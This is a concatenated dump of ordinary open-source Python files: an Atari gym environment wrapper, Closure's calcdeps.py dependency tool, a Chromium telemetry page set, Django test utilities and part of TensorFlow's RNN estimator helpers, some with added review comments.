    Each raw frame is optionally preprocessed (crop & resize, grayscale, or
    Y-channel extraction) and flattened to a (hei_state * wid_state,) vector.
    """

    def __init__(self, args, env_ind=0):
        super(AtariEnv, self).__init__(args, env_ind)
        assert self.env_type == "atari"
        try: import gym
        except ImportError as e: self.logger.warning("WARNING: gym not found")

        self.env = gym.make(self.game)
        self.env.seed(self.seed)  # NOTE: so each env would be different

        # action space setup
        self.actions = range(self.action_dim)
        self.logger.warning("Action Space: %s", self.actions)
        # state space setup
        self.hei_state = args.hei_state
        self.wid_state = args.wid_state
        # BUG FIX: was ``args.preprocess_mode if not None else 0`` -- since
        # ``not None`` is always True, the 0 fallback was unreachable and an
        # unset mode would leak through as None. Test the attribute itself.
        # Modes: 0 (do nothing) | 1 (rgb2gray) | 2 (rgb2y) | 3 (crop & resize)
        self.preprocess_mode = args.preprocess_mode if args.preprocess_mode is not None else 0
        # Preprocessing below assumes square output frames.
        assert self.hei_state == self.wid_state
        self.logger.warning("State Space: (" + str(self.state_shape) + " * " + str(self.state_shape) + ")")

    def _preprocessState(self, state):
        """Preprocess one raw frame and flatten it to a 1-D vector."""
        if self.preprocess_mode == 3:   # crop then resize
            # NOTE(review): assumes preprocessAtari() already yields a
            # hei_state x wid_state frame -- confirm against utils.helpers.
            state = preprocessAtari(state)
        if self.preprocess_mode == 2:   # rgb2y
            state = scale(rgb2y(state), self.hei_state, self.wid_state) / 255.
        elif self.preprocess_mode == 1: # rgb2gray
            state = scale(rgb2gray(state), self.hei_state, self.wid_state) / 255.
        elif self.preprocess_mode == 0: # do nothing
            pass
        return state.reshape(self.hei_state * self.wid_state)

    @property
    def state_shape(self):
        # Frames are square (asserted in __init__), so one side suffices.
        return self.hei_state

    def render(self):
        return self.env.render()

    def visual(self):
        """Push the current frame to visdom and/or dump it to disk."""
        if self.visualize:
            # vis / refs / win_state1 are presumably initialized by the base
            # Env -- confirm against core.env.Env.
            self.win_state1 = self.vis.image(np.transpose(self.exp_state1, (2, 0, 1)), env=self.refs, win=self.win_state1, opts=dict(title="state1"))
        if self.mode == 2:
            frame_name = self.img_dir + "frame_%04d.jpg" % self.frame_ind
            self.imsave(frame_name, self.exp_state1)
            self.logger.warning("Saved Frame @ Step: " + str(self.frame_ind) + " To: " + frame_name)
            self.frame_ind += 1

    def sample_random_action(self):
        return self.env.action_space.sample()

    def reset(self):
        # TODO: could add random start here, since random start only make sense for atari games
        self._reset_experience()
        self.exp_state1 = self.env.reset()
        return self._get_experience()

    def step(self, action_index):
        self.exp_action = action_index
        self.exp_state1, self.exp_reward, self.exp_terminal1, _ = self.env.step(self.actions[self.exp_action])
        return self._get_experience()
| mit |
PeterWangIntel/chromium-crosswalk | third_party/google_input_tools/third_party/closure_library/closure/bin/calcdeps.py | 223 | 18544 | #!/usr/bin/env python
#
# Copyright 2006 The Closure Library Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Calculates JavaScript dependencies without requiring Google's build system.
This tool is deprecated and is provided for legacy users.
See build/closurebuilder.py and build/depswriter.py for the current tools.
It iterates over a number of search paths and builds a dependency tree. With
the inputs provided, it walks the dependency tree and outputs all the files
required for compilation.
"""
try:
import distutils.version
except ImportError:
# distutils is not available in all environments
distutils = None
import logging
import optparse
import os
import re
import subprocess
import sys
_BASE_REGEX_STRING = '^\s*goog\.%s\(\s*[\'"](.+)[\'"]\s*\)'
req_regex = re.compile(_BASE_REGEX_STRING % 'require')
prov_regex = re.compile(_BASE_REGEX_STRING % 'provide')
ns_regex = re.compile('^ns:((\w+\.)*(\w+))$')
version_regex = re.compile('[\.0-9]+')
def IsValidFile(ref):
  """Report whether *ref* refers to an existing regular file."""
  return os.path.isfile(ref)
def IsJsFile(ref):
  """Report whether *ref* names a JavaScript source file (.js suffix)."""
  _JS_SUFFIX = '.js'
  return ref.endswith(_JS_SUFFIX)
def IsNamespace(ref):
  """Report whether *ref* is a namespace reference (``ns:foo.bar`` form)."""
  return bool(re.match(ns_regex, ref))
def IsDirectory(ref):
  """Report whether *ref* refers to an existing directory."""
  return os.path.isdir(ref)
def ExpandDirectories(refs):
  """Expands any directory references into inputs.

  Description:
    Looks for any directories in the provided references. Found directories
    are recursively searched for .js files, which are then added to the result
    list.

  Args:
    refs: a list of references such as files, directories, and namespaces

  Returns:
    A list of references with directories removed and replaced by any
    .js files that are found in them. Also, the paths will be normalized.
  """
  result = []
  for ref in refs:
    if IsDirectory(ref):
      # pylint: disable=unused-variable
      for (directory, subdirs, filenames) in os.walk(ref):
        for filename in filenames:
          if IsJsFile(filename):
            result.append(os.path.join(directory, filename))
    else:
      result.append(ref)
  # BUG FIX: this used to be ``map(os.path.normpath, result)``. Under
  # Python 3 map() returns a lazy iterator, and callers concatenate this
  # result with lists (e.g. ``source_paths + deps`` in PrintDeps), which
  # raises TypeError. Return a real list, as it always was on Python 2.
  return [os.path.normpath(path) for path in result]
class DependencyInfo(object):
  """Represents a dependency that is used to build and walk a tree."""

  def __init__(self, filename):
    self.filename = filename
    # Namespaces this file goog.provide()s / goog.require()s.
    self.provides = []
    self.requires = []

  def __str__(self):
    return '{0} Provides: {1!r} Requires: {2!r}'.format(
        self.filename, self.provides, self.requires)
def BuildDependenciesFromFiles(files):
  """Build a list of dependencies from a list of files.

  Parses each unique file for goog.provide/goog.require statements and
  returns one DependencyInfo per distinct filename, in input order.

  Args:
    files: a list of files to be parsed for goog.provides and goog.requires.

  Returns:
    A list of dependency objects, one for each file in the files argument.
  """
  result = []
  seen = set()
  for filename in files:
    if filename in seen:
      continue
    seen.add(filename)
    # Python 3 requires the file encoding to be specified
    if (sys.version_info[0] < 3):
      file_handle = open(filename, 'r')
    else:
      file_handle = open(filename, 'r', encoding='utf8')
    try:
      result.append(CreateDependencyInfo(filename, file_handle))
    finally:
      file_handle.close()
  return result
def CreateDependencyInfo(filename, source):
  """Create dependency info.

  Args:
    filename: Filename for source.
    source: File-like object containing source.

  Returns:
    A DependencyInfo object with provides and requires filled.
  """
  dep = DependencyInfo(filename)
  for line in source:
    # Both regexes are anchored with ^, so match() is equivalent to the
    # original match-then-search pair and scans each line only once.
    require_match = req_regex.match(line)
    if require_match:
      dep.requires.append(require_match.group(1))
    provide_match = prov_regex.match(line)
    if provide_match:
      dep.provides.append(provide_match.group(1))
  return dep
def BuildDependencyHashFromDependencies(deps):
  """Builds a hash for searching dependencies by the namespaces they provide.

  Each dependency may provide several namespaces; every provide is mapped
  to its dependency so a namespace can be resolved in O(1).

  Args:
    deps: a list of dependency objects used to build the hash.

  Raises:
    Exception: If a multiple files try to provide the same namepace.

  Returns:
    A hash table { namespace: dependency } that can be used to resolve a
    dependency by a namespace it provides.
  """
  dep_hash = {}
  for dep in deps:
    for provide in dep.provides:
      existing = dep_hash.get(provide)
      if existing is not None:
        raise Exception('Duplicate provide (%s) in (%s, %s)' % (
            provide, existing.filename, dep.filename))
      dep_hash[provide] = dep
  return dep_hash
def CalculateDependencies(paths, inputs):
  """Calculates the dependencies for given inputs.

  Description:
    This method takes a list of paths (files, directories) and builds a
    searchable data structure based on the namespaces that each .js file
    provides. It then parses through each input, resolving dependencies
    against this data structure. The final output is a list of files,
    including the inputs, that represent all of the code that is needed to
    compile the given inputs.

  Args:
    paths: the references (files, directories) that are used to build the
      dependency hash.
    inputs: the inputs (files, directories, namespaces) that have dependencies
      that need to be calculated.

  Raises:
    Exception: if a provided input is invalid.

  Returns:
    A list of all files, including inputs, that are needed to compile the given
    inputs.
  """
  deps = BuildDependenciesFromFiles(paths + inputs)
  search_hash = BuildDependencyHashFromDependencies(deps)
  result_list = []
  seen_list = []
  for input_file in inputs:
    if IsNamespace(input_file):
      # ns:foo.bar inputs are resolved to the file that provides them.
      namespace = re.search(ns_regex, input_file).group(1)
      if namespace not in search_hash:
        raise Exception('Invalid namespace (%s)' % namespace)
      input_file = search_hash[namespace].filename
    if not IsValidFile(input_file) or not IsJsFile(input_file):
      raise Exception('Invalid file (%s)' % input_file)
    seen_list.append(input_file)
    # Re-scan the input for goog.require lines and resolve each one
    # depth-first, so dependencies land in result_list before dependants.
    # NOTE(review): opened without an explicit encoding, unlike
    # BuildDependenciesFromFiles -- may misread UTF-8 inputs on Python 3.
    file_handle = open(input_file, 'r')
    try:
      for line in file_handle:
        if re.match(req_regex, line):
          require = re.search(req_regex, line).group(1)
          ResolveDependencies(require, search_hash, result_list, seen_list)
    finally:
      file_handle.close()
    result_list.append(input_file)

  # All files depend on base.js, so put it first.
  base_js_path = FindClosureBasePath(paths)
  if base_js_path:
    result_list.insert(0, base_js_path)
  else:
    logging.warning('Closure Library base.js not found.')

  return result_list
def FindClosureBasePath(paths):
  """Given a list of file paths, return Closure base.js path, if any.

  Args:
    paths: A list of paths.

  Returns:
    The path to Closure's base.js file including filename, if found.
  """
  for path in paths:
    if os.path.basename(path) != 'base.js':
      continue
    # Sanity check that this really is Closure's base file: only the true
    # base.js carries the @provideGoog marker where goog is defined.
    candidate = open(path)
    found_marker = False
    for line in candidate:
      if '@provideGoog' in line:
        found_marker = True
        break
    candidate.close()
    if found_marker:
      return path
def ResolveDependencies(require, search_hash, result_list, seen_list):
  """Takes a given requirement and resolves all of the dependencies for it.

  Recursively resolves everything *require* depends on, appending filenames
  to result_list in dependency-before-dependant order.

  Raises:
    Exception: when require does not exist in the search_hash.

  Args:
    require: the namespace to resolve dependencies for.
    search_hash: the data structure used for resolving dependencies.
    result_list: a list of filenames that have been calculated as dependencies.
      This variable is the output for this function.
    seen_list: a list of filenames that have been 'seen'. This is required
      for the dependency->dependant ordering.
  """
  dep = search_hash.get(require)
  if dep is None:
    raise Exception('Missing provider for (%s)' % require)
  if dep.filename in seen_list:
    return
  seen_list.append(dep.filename)
  for sub_require in dep.requires:
    ResolveDependencies(sub_require, search_hash, result_list, seen_list)
  result_list.append(dep.filename)
def GetDepsLine(dep, base_path):
  """Returns a JS string for a dependency statement in the deps.js file.

  Args:
    dep: The dependency that we're printing.
    base_path: The path to Closure's base.js including filename.
  """
  relative_path = GetRelpath(dep.filename, base_path)
  return 'goog.addDependency("%s", %s, %s);' % (
      relative_path, dep.provides, dep.requires)
def GetRelpath(path, start):
  """Return a relative path to |path| from |start|."""
  # NOTE: Python 2.6 provides os.path.relpath, which has almost the same
  # functionality as this function. Since we want to support 2.4, we have
  # to implement it manually. :(
  path_list = os.path.abspath(os.path.normpath(path)).split(os.sep)
  start_list = os.path.abspath(
      os.path.normpath(os.path.dirname(start))).split(os.sep)

  common = 0
  while (common < len(path_list) and common < len(start_list)
         and path_list[common] == start_list[common]):
    common += 1

  # Always use forward slashes, because this will get expanded to a url,
  # not a file path.
  ups = ['..'] * (len(start_list) - common)
  return '/'.join(ups + path_list[common:])
def PrintLine(msg, out):
  """Write *msg* to *out*, followed by a newline."""
  out.write('%s\n' % msg)
def PrintDeps(source_paths, deps, out):
  """Print out a deps.js file from a list of source paths.

  Args:
    source_paths: Paths that we should generate dependency info for.
    deps: Paths that provide dependency info. Their dependency info should
      not appear in the deps file.
    out: The output file.

  Returns:
    True on success, false if it was unable to find the base path
    to generate deps relative to.
  """
  base_path = FindClosureBasePath(source_paths + deps)
  if not base_path:
    return False

  PrintLine('// This file was autogenerated by calcdeps.py', out)
  excluded = set(deps)
  for dep in BuildDependenciesFromFiles(source_paths + deps):
    if dep.filename not in excluded:
      PrintLine(GetDepsLine(dep, base_path), out)
  return True
def PrintScript(source_paths, out):
  """Write the contents of each source file to *out*, labelled by index."""
  for index, source_path in enumerate(source_paths):
    PrintLine('// Input %d' % index, out)
    source_file = open(source_path, 'r')
    contents = source_file.read()
    source_file.close()
    PrintLine(contents, out)
def GetJavaVersion():
  """Returns the string for the current version of Java installed."""
  proc = subprocess.Popen(['java', '-version'], stderr=subprocess.PIPE)
  proc.wait()
  # java prints its version banner to stderr. BUG FIX: decode the pipe
  # output -- under Python 3 it is bytes, and searching it with the str
  # pattern ``version_regex`` raises TypeError.
  banner = proc.stderr.read().decode('utf-8', 'replace')
  version_line = banner.splitlines()[0]
  return version_regex.search(version_line).group()
def FilterByExcludes(options, files):
  """Filters the given files by the exlusions specified at the command line.

  Args:
    options: The flags to calcdeps.
    files: The files to filter.

  Returns:
    A list of files.
  """
  if options.excludes:
    excluded = set(ExpandDirectories(options.excludes))
  else:
    excluded = set()
  return [path for path in files if path not in excluded]
def GetPathsFromOptions(options):
  """Generates the path files from flag options.

  Args:
    options: The flags to calcdeps.

  Returns:
    A list of files in the specified paths. (strings).
  """
  # Fall back to the current folder when no --path flag was given.
  search_paths = options.paths or ['.']
  return FilterByExcludes(options, ExpandDirectories(search_paths))
def GetInputsFromOptions(options):
  """Generates the inputs from flag options.

  Args:
    options: The flags to calcdeps.

  Returns:
    A list of inputs (strings).
  """
  inputs = options.inputs
  if not inputs:  # Parse stdin
    logging.info('No inputs specified. Reading from stdin...')
    # Keep only non-empty lines, newline stripped.
    inputs = [line.strip('\n') for line in sys.stdin.readlines()
              if line.strip('\n')]

  logging.info('Scanning files...')
  return FilterByExcludes(options, ExpandDirectories(inputs))
def Compile(compiler_jar_path, source_paths, out, flags=None):
  """Prepares command-line call to Closure compiler.

  Args:
    compiler_jar_path: Path to the Closure compiler .jar file.
    source_paths: Source paths to build, in order.
    out: File-like object that receives the compiled output on success.
    flags: A list of additional flags to pass on to Closure compiler.
  """
  args = ['java', '-jar', compiler_jar_path]
  for path in source_paths:
    args += ['--js', path]

  if flags:
    args += flags

  logging.info('Compiling with the following command: %s', ' '.join(args))
  proc = subprocess.Popen(args, stdout=subprocess.PIPE)
  # NOTE(review): stdoutdata is bytes under Python 3, while callers pass a
  # text-mode stream for ``out`` -- confirm this path on Python 3.
  (stdoutdata, stderrdata) = proc.communicate()

  if proc.returncode != 0:
    logging.error('JavaScript compilation failed.')
    sys.exit(1)
  else:
    out.write(stdoutdata)
def main():
  """The entrypoint for this script."""

  logging.basicConfig(format='calcdeps.py: %(message)s', level=logging.INFO)

  usage = 'usage: %prog [options] arg'
  parser = optparse.OptionParser(usage)
  parser.add_option('-i',
                    '--input',
                    dest='inputs',
                    action='append',
                    help='The inputs to calculate dependencies for. Valid '
                         'values can be files, directories, or namespaces '
                         '(ns:goog.net.XhrIo). Only relevant to "list" and '
                         '"script" output.')
  parser.add_option('-p',
                    '--path',
                    dest='paths',
                    action='append',
                    help='The paths that should be traversed to build the '
                         'dependencies.')
  parser.add_option('-d',
                    '--dep',
                    dest='deps',
                    action='append',
                    help='Directories or files that should be traversed to '
                         'find required dependencies for the deps file. '
                         'Does not generate dependency information for names '
                         'provided by these files. Only useful in "deps" mode.')
  parser.add_option('-e',
                    '--exclude',
                    dest='excludes',
                    action='append',
                    help='Files or directories to exclude from the --path '
                         'and --input flags')
  parser.add_option('-o',
                    '--output_mode',
                    dest='output_mode',
                    action='store',
                    default='list',
                    help='The type of output to generate from this script. '
                         'Options are "list" for a list of filenames, "script" '
                         'for a single script containing the contents of all the '
                         'file, "deps" to generate a deps.js file for all '
                         'paths, or "compiled" to produce compiled output with '
                         'the Closure compiler.')
  parser.add_option('-c',
                    '--compiler_jar',
                    dest='compiler_jar',
                    action='store',
                    help='The location of the Closure compiler .jar file.')
  parser.add_option('-f',
                    '--compiler_flag',
                    '--compiler_flags', # for backwards compatability
                    dest='compiler_flags',
                    action='append',
                    help='Additional flag to pass to the Closure compiler. '
                         'May be specified multiple times to pass multiple flags.')
  parser.add_option('--output_file',
                    dest='output_file',
                    action='store',
                    help=('If specified, write output to this path instead of '
                          'writing to standard output.'))

  (options, args) = parser.parse_args()

  search_paths = GetPathsFromOptions(options)

  # Output destination: an explicit file, or stdout by default.
  if options.output_file:
    out = open(options.output_file, 'w')
  else:
    out = sys.stdout

  # "deps" mode runs before inputs are gathered: it only needs the paths.
  if options.output_mode == 'deps':
    result = PrintDeps(search_paths, ExpandDirectories(options.deps or []), out)
    if not result:
      logging.error('Could not find Closure Library in the specified paths')
      sys.exit(1)

    return

  inputs = GetInputsFromOptions(options)

  logging.info('Finding Closure dependencies...')
  deps = CalculateDependencies(search_paths, inputs)
  output_mode = options.output_mode

  # Dispatch on the requested output mode.
  if output_mode == 'script':
    PrintScript(deps, out)
  elif output_mode == 'list':
    # Just print out a dep per line
    for dep in deps:
      PrintLine(dep, out)
  elif output_mode == 'compiled':
    # Make sure a .jar is specified.
    if not options.compiler_jar:
      logging.error('--compiler_jar flag must be specified if --output is '
                    '"compiled"')
      sys.exit(1)

    # User friendly version check.
    if distutils and not (distutils.version.LooseVersion(GetJavaVersion()) >
        distutils.version.LooseVersion('1.6')):
      logging.error('Closure Compiler requires Java 1.6 or higher.')
      logging.error('Please visit http://www.java.com/getjava')
      sys.exit(1)

    Compile(options.compiler_jar, deps, out, options.compiler_flags)

  else:
    logging.error('Invalid value for --output flag.')
    sys.exit(1)
if __name__ == '__main__':
main()
| bsd-3-clause |
hujiajie/chromium-crosswalk | tools/perf/page_sets/alexa1-10000.py | 35 | 1340 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import os
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
from telemetry import story
__location__ = os.path.realpath(
os.path.join(os.getcwd(), os.path.dirname(__file__)))
# Generated on 2013-09-03 13:59:53.459117 by rmistry using
# create_page_set.py.
_TOP_10000_ALEXA_FILE = os.path.join(__location__, 'alexa1-10000-urls.json')
class Alexa1To10000Page(page_module.Page):
  """One page drawn from the Alexa top-10000 URL list, run with the
  shared desktop browser state."""

  def __init__(self, url, page_set):
    super(Alexa1To10000Page, self).__init__(
        url=url, page_set=page_set,
        shared_page_state_class=shared_page_state.SharedDesktopPageState)

  def RunPageInteractions(self, action_runner):
    # The only measured interaction is a single scroll of the page,
    # wrapped in a gesture interaction record for the timeline.
    with action_runner.CreateGestureInteraction('ScrollAction'):
      action_runner.ScrollPage()
class Alexa1To10000PageSet(story.StorySet):
  """ Top 1-10000 Alexa global.

  Generated on 2013-09-03 13:59:53.459117 by rmistry using
  create_page_set.py.
  """

  def __init__(self):
    super(Alexa1To10000PageSet, self).__init__()
    # The URL list is a JSON array stored next to this module
    # (see _TOP_10000_ALEXA_FILE above).
    with open(_TOP_10000_ALEXA_FILE) as f:
      urls_list = json.load(f)
    # One story per URL, all sharing this story set.
    for url in urls_list:
      self.AddStory(Alexa1To10000Page(url, self))
| bsd-3-clause |
thomasgilgenast/gilgistatus-nonrel | django/test/utils.py | 185 | 3644 | import sys
import time
import os
import warnings
from django.conf import settings
from django.core import mail
from django.core.mail.backends import locmem
from django.test import signals
from django.template import Template
from django.utils.translation import deactivate
__all__ = ('Approximate', 'ContextList', 'setup_test_environment',
'teardown_test_environment', 'get_runner')
class Approximate(object):
    """Value wrapper that compares equal to any number within ``places``
    decimal places of ``val`` -- useful for floating point assertions in
    tests.
    """
    def __init__(self, val, places=7):
        self.val = val
        self.places = places

    def __repr__(self):
        return repr(self.val)

    def __eq__(self, other):
        # Exact match first (also covers non-numeric equality), then an
        # approximate match rounded to `places` decimal places.
        if self.val == other:
            return True
        return round(abs(self.val - other), self.places) == 0

    def __ne__(self, other):
        # Python 2 does not derive __ne__ from __eq__, so without this an
        # Approximate could be both == and != to the same value.  Keep the
        # two operators consistent.
        return not self.__eq__(other)
class ContextList(list):
    """A wrapper that provides direct key access to context items contained
    in a list of context objects.
    """
    def __getitem__(self, key):
        # String keys: search each subcontext in order and return the
        # first value found, so earlier contexts shadow later ones.
        # Any other key (e.g. an int index) behaves like plain list
        # indexing.  NOTE: `basestring` makes this Python 2 only.
        if isinstance(key, basestring):
            for subcontext in self:
                if key in subcontext:
                    return subcontext[key]
            raise KeyError(key)
        else:
            return super(ContextList, self).__getitem__(key)

    def __contains__(self, key):
        # Delegate membership to __getitem__, so `key in ctx` means
        # "some subcontext defines this variable".
        try:
            value = self[key]
        except KeyError:
            return False
        return True
def instrumented_test_render(self, context):
    """
    An instrumented Template render method, providing a signal
    that can be intercepted by the test system Client
    """
    # Fire the template_rendered signal before delegating to the normal
    # nodelist rendering.  This function is installed in place of
    # Template._render by setup_test_environment().
    signals.template_rendered.send(sender=self, template=self, context=context)
    return self.nodelist.render(context)
def setup_test_environment():
    """Perform any global pre-test setup. This involves:

        - Installing the instrumented test renderer
        - Set the email backend to the locmem email backend.
        - Setting the active locale to match the LANGUAGE_CODE setting.
    """
    # Stash each original on the object being patched so that
    # teardown_test_environment() can restore it later.
    Template.original_render = Template._render
    Template._render = instrumented_test_render

    # Replace both the legacy SMTPConnection alias and the configured
    # backend with the in-memory backend.
    mail.original_SMTPConnection = mail.SMTPConnection
    mail.SMTPConnection = locmem.EmailBackend

    mail.original_email_backend = settings.EMAIL_BACKEND
    settings.EMAIL_BACKEND = 'django.core.mail.backends.locmem.EmailBackend'

    # Messages "sent" during tests accumulate here instead of going out.
    mail.outbox = []

    # Deactivate any active translation so tests start from a known locale.
    deactivate()
def teardown_test_environment():
    """Perform any global post-test teardown. This involves:

        - Restoring the original test renderer
        - Restoring the email sending functions
    """
    # Undo everything setup_test_environment() patched and delete the
    # stashed originals so repeated setup/teardown cycles start clean.
    Template._render = Template.original_render
    del Template.original_render

    mail.SMTPConnection = mail.original_SMTPConnection
    del mail.original_SMTPConnection

    settings.EMAIL_BACKEND = mail.original_email_backend
    del mail.original_email_backend

    del mail.outbox
def get_warnings_state():
    """Capture and return a snapshot of the warnings module's filters."""
    # The warnings module exposes no public API for this, but copying the
    # filter list directly works on Python 2.4 through 2.7 (pair of
    # get_warnings_state / restore_warnings_state).
    return list(warnings.filters)
def restore_warnings_state(state):
    """Reset the warnings module to *state*, a snapshot previously
    returned by get_warnings_state().
    """
    # Install a copy so later mutations of the module's filter list do
    # not corrupt the caller's saved snapshot.
    warnings.filters = list(state)
def get_runner(settings):
    """Resolve settings.TEST_RUNNER (a dotted path) to the runner object."""
    module_path, _, attr_name = settings.TEST_RUNNER.rpartition('.')
    if not module_path:
        # Allow for Python 2.5 relative paths
        module_path = '.'
    runner_module = __import__(module_path, {}, {}, attr_name)
    return getattr(runner_module, attr_name)
| bsd-3-clause |
ryfeus/lambda-packs | Keras_tensorflow_nightly/source2.7/tensorflow/contrib/learn/python/learn/estimators/rnn_common.py | 42 | 12923 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Common operations for RNN Estimators (deprecated).
This module and all its submodules are deprecated. See
[contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md)
for migration instructions.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import metrics
from tensorflow.contrib import rnn as contrib_rnn
from tensorflow.contrib.learn.python.learn.estimators import constants
from tensorflow.contrib.learn.python.learn.estimators import prediction_key
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
# NOTE(jtbates): As of February 10, 2017, some of the `RNNKeys` have been
# removed and replaced with values from `prediction_key.PredictionKey`. The key
# `RNNKeys.PREDICTIONS_KEY` has been replaced by
# `prediction_key.PredictionKey.SCORES` for regression and
# `prediction_key.PredictionKey.CLASSES` for classification. The key
# `RNNKeys.PROBABILITIES_KEY` has been replaced by
# `prediction_key.PredictionKey.PROBABILITIES`.
class RNNKeys(object):
  """String constants used as keys in RNN estimator feature and
  prediction dictionaries."""
  FINAL_STATE_KEY = 'final_state'
  LABELS_KEY = '__labels__'
  SEQUENCE_LENGTH_KEY = 'sequence_length'
  # Per-layer cell states are stored under keys beginning with this prefix.
  STATE_PREFIX = 'rnn_cell_state'
class PredictionType(object):
  """Enum-like values for the type of prediction that the model makes.
  """
  # One prediction for the whole sequence.
  SINGLE_VALUE = 1
  # One prediction per time step.
  MULTIPLE_VALUE = 2
_CELL_TYPES = {'basic_rnn': contrib_rnn.BasicRNNCell,
'lstm': contrib_rnn.LSTMCell,
'gru': contrib_rnn.GRUCell,}
def _get_single_cell(cell_type, num_units):
  """Constructs and return a single `RNNCell`.

  Args:
    cell_type: Either a string identifying the `RNNCell` type or a subclass of
      `RNNCell`.
    num_units: The number of units in the `RNNCell`.
  Returns:
    An initialized `RNNCell`.
  Raises:
    ValueError: `cell_type` is an invalid `RNNCell` name.
    TypeError: `cell_type` is not a string or a subclass of `RNNCell`.
  """
  # Map a registered name ('basic_rnn', 'lstm', 'gru') to its class; any
  # other value is passed through and validated as an RNNCell subclass.
  resolved_type = _CELL_TYPES.get(cell_type, cell_type)
  if not resolved_type or not issubclass(resolved_type, contrib_rnn.RNNCell):
    raise ValueError('The supported cell types are {}; got {}'.format(
        list(_CELL_TYPES.keys()), resolved_type))
  return resolved_type(num_units=num_units)
def construct_rnn_cell(num_units, cell_type='basic_rnn',
                       dropout_keep_probabilities=None):
  """Constructs cells, applies dropout and assembles a `MultiRNNCell`.

  The cell type chosen by DynamicRNNEstimator.__init__() is the same as
  returned by this function when called with the same arguments.

  Args:
    num_units: A single `int` or a list/tuple of `int`s. The size of the
      `RNNCell`s.
    cell_type: A string identifying the `RNNCell` type or a subclass of
      `RNNCell`.
    dropout_keep_probabilities: a list of dropout probabilities or `None`. If a
      list is given, it must have length `len(cell_type) + 1`.

  Returns:
    An initialized `RNNCell`.
  """
  # Normalize a scalar layer size into a one-element sequence.
  if not isinstance(num_units, (list, tuple)):
    num_units = (num_units,)

  cells = [_get_single_cell(cell_type, layer_size) for layer_size in num_units]
  if dropout_keep_probabilities:
    cells = apply_dropout(cells, dropout_keep_probabilities)

  # A single layer needs no MultiRNNCell wrapper.
  return cells[0] if len(cells) == 1 else contrib_rnn.MultiRNNCell(cells)
def apply_dropout(cells, dropout_keep_probabilities, random_seed=None):
  """Applies dropout to the outputs and inputs of `cell`.

  All but the last cell receive input dropout only (output keep
  probability 1.0); the last cell applies both the final input dropout
  and the output dropout, so each of the `len(cells) + 1` probabilities
  is used exactly once.

  Args:
    cells: A list of `RNNCell`s.
    dropout_keep_probabilities: a list whose elements are either floats in
      `[0.0, 1.0]` or `None`. It must have length one greater than `cells`.
    random_seed: Seed for random dropout.

  Returns:
    A list of `RNNCell`s, the result of applying the supplied dropouts.

  Raises:
    ValueError: If `len(dropout_keep_probabilities) != len(cells) + 1`.
  """
  if len(dropout_keep_probabilities) != len(cells) + 1:
    raise ValueError(
        'The number of dropout probabilities must be one greater than the '
        'number of cells. Got {} cells and {} dropout probabilities.'.format(
            len(cells), len(dropout_keep_probabilities)))
  wrapped_cells = [
      contrib_rnn.DropoutWrapper(cell, prob, 1.0, seed=random_seed)
      for cell, prob in zip(cells[:-1], dropout_keep_probabilities[:-2])
  ]
  # Bug fix: the seed was previously dropped for the final wrapper, so a
  # caller-supplied random_seed did not make the last layer's dropout
  # deterministic.  Pass it here as well for consistency.
  wrapped_cells.append(
      contrib_rnn.DropoutWrapper(cells[-1], dropout_keep_probabilities[-2],
                                 dropout_keep_probabilities[-1],
                                 seed=random_seed))
  return wrapped_cells
def get_eval_metric_ops(problem_type, prediction_type, sequence_length,
                        prediction_dict, labels):
  """Returns eval metric ops for given `problem_type` and `prediction_type`.

  Args:
    problem_type: `ProblemType.CLASSIFICATION` or
      `ProblemType.LINEAR_REGRESSION`.
    prediction_type: `PredictionType.SINGLE_VALUE` or
      `PredictionType.MULTIPLE_VALUE`.
    sequence_length: A `Tensor` with shape `[batch_size]` and dtype `int32`
      containing the length of each sequence in the batch. If `None`, sequences
      are assumed to be unpadded.
    prediction_dict: A dict of prediction tensors.
    labels: The label `Tensor`.

  Returns:
    A `dict` mapping strings to the result of calling the metric_fn.
  """
  eval_metric_ops = {}
  if problem_type == constants.ProblemType.CLASSIFICATION:
    # Multi value classification
    if prediction_type == PredictionType.MULTIPLE_VALUE:
      # Strip padded timesteps first so padding does not dilute accuracy.
      mask_predictions, mask_labels = mask_activations_and_labels(
          prediction_dict[prediction_key.PredictionKey.CLASSES], labels,
          sequence_length)
      eval_metric_ops['accuracy'] = metrics.streaming_accuracy(
          predictions=mask_predictions, labels=mask_labels)
    # Single value classification
    elif prediction_type == PredictionType.SINGLE_VALUE:
      eval_metric_ops['accuracy'] = metrics.streaming_accuracy(
          predictions=prediction_dict[prediction_key.PredictionKey.CLASSES],
          labels=labels)
  elif problem_type == constants.ProblemType.LINEAR_REGRESSION:
    # Regression adds no extra metrics beyond the default loss; the
    # branches are kept explicit to mirror the classification structure.
    # Multi value regression
    if prediction_type == PredictionType.MULTIPLE_VALUE:
      pass
    # Single value regression
    elif prediction_type == PredictionType.SINGLE_VALUE:
      pass
  return eval_metric_ops
def select_last_activations(activations, sequence_lengths):
  """Selects the nth set of activations for each n in `sequence_length`.

  Returns a `Tensor` of shape `[batch_size, k]`. If `sequence_length` is not
  `None`, then `output[i, :] = activations[i, sequence_length[i] - 1, :]`. If
  `sequence_length` is `None`, then `output[i, :] = activations[i, -1, :]`.

  Args:
    activations: A `Tensor` with shape `[batch_size, padded_length, k]`.
    sequence_lengths: A `Tensor` with shape `[batch_size]` or `None`.
  Returns:
    A `Tensor` of shape `[batch_size, k]`.
  """
